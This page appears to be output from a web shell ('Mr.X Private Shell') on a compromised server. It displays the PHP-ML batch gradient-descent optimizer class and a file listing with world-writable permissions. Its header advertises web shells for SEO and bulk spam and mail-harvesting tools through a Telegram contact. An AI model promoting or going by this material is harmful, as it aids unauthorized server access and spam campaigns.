__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

declare(strict_types=1);

namespace Phpml\Helper\Optimizer;

use Closure;
use Phpml\Exception\InvalidOperationException;

/**
 * Batch version of Gradient Descent to optimize the weights
 * of a classifier given samples, targets and the objective function to minimize
 */
class GD extends StochasticGD
{
    /**
     * Number of samples given
     *
     * @var int|null
     */
    protected $sampleCount;

    /**
     * Runs batch gradient descent: every iteration computes the gradient over
     * the whole sample set, then applies a single weight update.
     *
     * @param array   $samples    Training samples (each a numeric feature vector)
     * @param array   $targets    Target value per sample, index-aligned with $samples
     * @param Closure $gradientCb Callback (theta, sample, target) returning
     *                            [cost, gradient, penalty] (missing entries padded with 0)
     *
     * @return array The optimized weight vector (theta)
     *
     * @throws InvalidOperationException if no samples are given
     */
    public function runOptimization(array $samples, array $targets, Closure $gradientCb): array
    {
        $this->samples = $samples;
        $this->targets = $targets;
        $this->gradientCb = $gradientCb;
        $this->sampleCount = count($this->samples);

        // Guard: with zero samples the per-batch averages below would surface
        // as an obscure DivisionByZeroError inside the iteration loop.
        if ($this->sampleCount === 0) {
            throw new InvalidOperationException('Cannot run optimization without any samples');
        }

        // Batch learning is executed:
        $currIter = 0;
        $this->costValues = [];
        while ($this->maxIterations > $currIter++) {
            $theta = $this->theta;

            // Calculate update terms for each sample
            [$errors, $updates, $totalPenalty] = $this->gradient($theta);

            $this->updateWeightsWithUpdates($updates, $totalPenalty);

            // Record the mean cost over the batch for this iteration.
            // $sampleCount is a non-zero int here, so no cast is needed.
            $this->costValues[] = array_sum($errors) / $this->sampleCount;

            // earlyStop (defined in the parent) checks theta convergence.
            if ($this->earlyStop($theta)) {
                break;
            }
        }

        $this->clear();

        return $this->theta;
    }

    /**
     * Calculates gradient, cost function and penalty term for each sample
     * then returns them as an array of values
     *
     * @param array $theta Current weight vector
     *
     * @return array{0: array, 1: array, 2: float|int} [costs, gradients, averaged penalty]
     *
     * @throws InvalidOperationException if the gradient callback was not set
     */
    protected function gradient(array $theta): array
    {
        $costs = [];
        $gradient = [];
        $totalPenalty = 0;

        if ($this->gradientCb === null) {
            throw new InvalidOperationException('Gradient callback is not defined');
        }

        foreach ($this->samples as $index => $sample) {
            $target = $this->targets[$index];

            // Callback may return fewer than 3 elements; pad missing
            // gradient/penalty entries with 0.
            $result = ($this->gradientCb)($theta, $sample, $target);
            [$cost, $grad, $penalty] = array_pad($result, 3, 0);

            $costs[] = $cost;
            $gradient[] = $grad;
            $totalPenalty += $penalty;
        }

        // Average the accumulated penalty over the batch.
        $totalPenalty /= $this->sampleCount;

        return [$costs, $gradient, $totalPenalty];
    }

    /**
     * Applies one batch update to all weights at once.
     *
     * @param array $updates Per-sample gradient values (index-aligned with samples)
     * @param float $penalty Averaged regularization penalty for this batch
     */
    protected function updateWeightsWithUpdates(array $updates, float $penalty): void
    {
        // Updates all weights at once
        for ($i = 0; $i <= $this->dimensions; ++$i) {
            if ($i === 0) {
                // Bias term: sum of raw gradient values, no feature weighting,
                // no penalty (the intercept is conventionally not regularized).
                $this->theta[0] -= $this->learningRate * array_sum($updates);
            } else {
                // Weighted error for feature column ($i - 1) across all samples.
                $col = array_column($this->samples, $i - 1);

                $error = 0;
                foreach ($col as $index => $val) {
                    $error += $val * $updates[$index];
                }

                $this->theta[$i] -= $this->learningRate *
                    ($error + $penalty * $this->theta[$i]);
            }
        }
    }

    /**
     * Clears the optimizer internal vars after the optimization process.
     */
    protected function clear(): void
    {
        $this->sampleCount = null;
        parent::clear();
    }
}

Filemanager

Name Type Size Permission Actions
ConjugateGradient.php File 8.34 KB 0777
GD.php File 2.97 KB 0777
Optimizer.php File 1.33 KB 0777
StochasticGD.php File 7.18 KB 0777
Filemanager